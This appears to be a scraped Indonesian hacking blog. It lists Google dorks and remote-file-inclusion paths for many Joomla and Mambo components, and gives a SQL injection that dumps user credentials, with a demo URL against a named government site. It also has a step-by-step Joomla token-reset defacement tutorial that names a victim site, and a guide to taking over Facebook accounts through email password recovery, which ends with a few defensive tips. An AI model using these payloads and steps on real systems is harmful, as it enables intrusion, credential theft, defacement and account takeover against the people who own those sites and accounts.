/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell

inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell

inurl:"com_comprofiler"
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell

inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell

inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll

inurl:"com_fm"
/components/com_fm/fm.install.php?lm_absolute_path=shell

inurl:com_mambelfish
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell

inurl:com_lmo
/components/com_lmo/lmo.php?mosConfig_absolute_path=shell

inurl:com_linkdirectory
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell

inurl:com_mtree
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell

inurl:com_jim
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell

inurl:com_webring
/administrator/components/com_webring/admin.webring.docs.php?component_dir=shell

inurl:com_remository
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

inurl:com_babackup
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell

inurl:com_lurm_constructor
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell

inurl:com_mambowiki
/components/com_mambowiki/ MamboLogin.php?IP=shell

inurl:com_a6mambocredits
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell

inurl:com_phpshop
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell

inurl:com_cpg
/components/com_cpg/cpg.php?mosConfig_absolute_path=shell

inurl:com_moodle
/components/com_moodle/moodle.php?mosConfig_absolute_path=shell

inurl:com_extended_registration
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell

inurl:com_mospray
/components/com_mospray/scripts/admin.php?basedir=shell

inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell

inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell

inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

inurl:com_madeira
/components/com_madeira/img.php?url=shell

inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell

inurl:com_bsq_sitestats
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell


dork= inurl:option=com_ignitegallery
exploit= option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--
demo= http://puspen.depdagri.go.id/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28id%2C0x3a%2Cname%2C0x3a%2Cusername%2C0x3a%2Cemail%2C0x3a%2Cpassword%2C0x3a%2Cusertype%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--

List Google

2:57 AM Add Comment
Afghanistan = www.google.com.af
American Samoa = www.google.as
Anguilla = www.google.off.ai
Antigua and Barbuda = www.google.com.ag
Argentina = www.google.com.ar
Armenia = www.google.am
Australia = www.google.com.au
Austria = www.google.at
Azerbaijan = www.google.az
Bahrain = www.google.com.bh
Bangladesh = www.google.com.bd
Belgium = www.google.be
Belize = www.google.com.bz
Bolivia = www.google.com.bo
Bosnia and Herzegovina = www.google.ba
Botswana = www.google.co.bw
Brazil = www.google.com.br
British Virgin Islands = www.google.vg
Bulgaria = www.google.bg
Burundi = www.google.bi
Canada = www.google.ca
Chile = www.google.cl
China = www.google.cn
Colombia = www.google.com.co
Congo, Democratic Republic of the = www.google.cd
Congo, Republic of the = www.google.cg
Cook Islands = www.google.co.ck
Costa Rica = www.google.co.cr
Croatia = www.google.hr
Cuba = www.google.com.cu
Czech Republic = www.google.cz
Cote dCase Ivoire = www.google.ci
Denmark = www.google.dk
Djibouti = www.google.dj
Dominica = www.google.dm
Dominican Republic = www.google.com.do
Ecuador = www.google.com.ec
Egypt = www.google.com.eg
El Salvador = www.google.com.sv
Estonia = www.google.ee
Ethiopia = www.google.com.et
Fiji = www.google.com.fj
Finland = www.google.fi
France = www.google.fr
Gambia = www.google.gm
Germany = www.google.de
Gibraltar = www.google.com.gi
Greece = www.google.com.gr
Greenland = www.google.gl
Guatemala = www.google.com.gt
Guernsey = www.google.gg
Haiti = www.google.ht
Honduras = www.google.hn
Hong Kong = www.google.com.hk
Hungary = www.google.hu
Iceland = www.google.is
India = www.google.co.in
Indonesia = www.google.co.id
Ireland = www.google.ie
Isle of Man = www.google.co.im
Israel = www.google.co.il
Italy = www.google.it
Jamaica = www.google.com.im
Japan = www.google.co.jp
Jersey = www.google.co.je
Jordan = www.google.jo
Kazakhstan = www.google.kz
Kenya = www.google.co.ke
Kyrgyzstan = www.google.kg
Latvia = www.google.lv
Lesotho = www.google.co.ls
Libya = www.google.co.ly
Liechtenstein = www.google.li
Lithuani = www.google.lt
Luxembourg = www.google.lu
Malawi = www.google.mw

Malaysia = www.google.com.my
Malta = www.google.com.mt
Mauritius = www.google.mu
Mexico = www.google.com.mx
Micronesia = www.google.fm
Mongolia = www.google.mn
Montserrat = www.google.ms
Morocco = www.google.co.ma
Namibia = www.google.com.na
Nepal = www.google.com.np
Netherlands = www.google.nl
New Zealand = www.google.co.nz
Nicaragua = www.google.com.ni
Norfolk Island = www.google.com.nf
Norway = www.google.no
Oman = www.google.com.om
Pakistan = www.google.com.pk
Panama = www.google.com.pa
Paraguay = www.google.com.py
Peru = www.google.com.pe
Philippines = www.google.com.ph
Pitcairn = www.google.com.pn
Poland = www.google.pl
Portugal = www.google.pt
Puerto Rico = www.google.com.pr
Qatar = www.google.com.qa
Romania = www.google.ro
Russia = www.google.ru
Rwanda = www.google.rw
Saint Helena = www.google.sh
San Marino = www.google.sm
Saudi Arabia = www.google.com.sa
Senegal = www.google.sn
Seychelles = www.google.sc
Singapore = www.google.com.sg
Slovakia = www.google.sk
Slovenia = www.google.si
South Africa = www.google.co.za
South Korea = www.google.co.kr
Spain = www.google.es
Sri Lanka = www.google.lk
St.Vincent and the Grenadines = www.google.com.vc
Sweden = www.google.se
Switzerland = www.google.ch
Taiwan = www.google.com.tw
Tajikistan = www.google.com.tj
Thailand = www.google.co.th
The Bahamas = www.google.bs
Tonga = www.google.to
Trinidad and Tobago = www.google.tt
Turkey = www.google.com.tr
Turkmenistan = www.google.tm
U.S. Virgin Islands = www.google.co.vi
Uganda = www.google.co.ug
Ukraine = www.google.com.ua
United Arab Emirates = www.google.ae
United Kingdom = www.google.co.uk
Uruguay = www.google.com.uy
Uzbekistan = www.google.co.uz
Venezuela = www.google.co.ve
Vietnam = www.google.com.vn
Zambia = www.google.co.zm

Hacking Joomla ala Token

2:54 AM Add Comment

Deface web ala token sudah banyak dipakai oleh pemula-pemula yang mw disebut dirinya hacker lanjut dah…

1. masuk ke google

2. search dengan dork inurl:option=com_user daerah tujuan contoh inurl:option=com_user denmark

3. contoh korban http://www.first.dk/index.php?option=com_user&view=reset&Itemid=7

ganti dengan

option=com_user&view=reset&layout=confirm

ntar jadi begini http://www.first.dk/index.php?option=com_user&view=reset&layout=confirm

udah ngerti kan step ini… lanjut

4. ntar keluar kotak yang namanya token…
isilah token itu dengan ketikan '

klo berhasil ntar akan keluar kotak new password..
lalu kamu ganti aja password na dengan sesuka hatimu

5. klo completed tinggal masuk deh halaman admin na dengan cara http://www.first.dk/administrator/
ganti aja belakang na kek example tadi

6.kebiasaan seh temen-temen dan author yang awal tutor ini make username admin
dan masukkan password anda reset tadi

7.kalo gagal berarti anda kurang beruntung masuk halaman administrator,kalo berhasil masuk ke bagian tempelate kalo g salah adanya di extension…
klik tempelates masuk terus liat layouts yang sedang di pakai adminnya…. yang ada gambar bintangnya….
terus klik lalu klik edit terus klik edit html
masukan semua html kamu di situ…

finish...
Haking Facebook melalui Email.

Haking Facebook melalui Email.

2:50 AM Add Comment
Hacking,,, susuatu yang kerap sekali dianggap tabu bagi sebagian orang, jalan hitam, cyber crime dan lain sebagainya. Namun bagi sbagian orang yang berkecimpung dalam dunia hacking, hacking is art, tak selamanya hacking itu merusak. Tergantung tujuan si Hacker, dari yang hanya menyusupi dan melihat-lihat data korban, menyusupi dan menghapus data-data korban atau memberikannya untuk pihak ketiga, serta bagi mereka yang menyusupi dan memberitahukan kepada korban bahwa account mereka mempunyai vulnerabilitas...

Langsung ke pokok masalah, tentang Hacking Facebook dan Cara Mengatasinya. Secara garis besar hacking facebook ada beberapa teknik, tetapi disini akan saya bahas 4 teknik yang sering digunakan, antara lain :

1. Serangan ke Email
2. Fake login atau Phising
3. Keylogger dan sejenisnya
4. Jebakan dengan Tutorial Hacking

ok, yang pertama serangan ke email. teknik ini sangat mudah dilakukan, tetapi mengandalkan feeling dan insting yang baik, dan seberapa banyak info yang didapatkan si hacker tentang si korban,,,

1. Anda harus mengetahui alamat email target [email facebook] dan mengumpulkan info tentang si target.

2. Masuk ke layanan email yang di gunakan si target, contoh gmail.com atau ymail.com

3. Lalu masuk ke layanan forgot password. Oke,,, contoh saja disini target menggunakan ymail. maka setelah masuk ymail.com klik pada opsi "I can't access my account"

4. Setelah itu pilih opsi "I forgot my password" dan next...

5. Masukkan email Target dan tulis captcha klik next...

6. Pilih opsi "i cannot access my alternatif email" kemudian next...

7. Akan muncul 2 pertanyaan keamanan email. Silahkan jawab pertanyaan tersebut.

8. Jika anda berhasil, maka anda akan di bawa ke menu reset password.

9. Setelah anda reset password target, anda akan langsung dapat masuk ke email target.

10. Email telah ditangan, tau sendiri kan gimana mengambil alih account Facebook target,,,,

Begitupun untuk gmail.com atau yang lain, cuman tingkat kesulitannya saja yang berbeda...


Cara mengatasi teknik ini....

1. Login Facebook anda, => Privacy setting => Contact Information
pada bagian email anda pilih "only me"

2. Pada pertanyaan email anda, gunakan pertanyaan yang tidak lazim, dan jawaban yang tidak nyambung.
examp : dimana anda bertemu pasangan anda??? jawab = becakrodatiga atau format tanggal 01/01/2011
jadi si hacker akan kesulitan menebak jawabannya,,,,

3. Gunakan layanan email yang lebih aman. examp : mail.com

4. Jangan memperlihatkan informasi sensitif anda kepada public. walaupun teman anda.

5. Selalu waspada terhadap orang baru yang add anda dan hati-hati saat anda chat dengan seseorang, adakalanya itu adalah si hacker yang menggunakan account palsu untuk mengorek informasi dari anda.

ponorogozone.com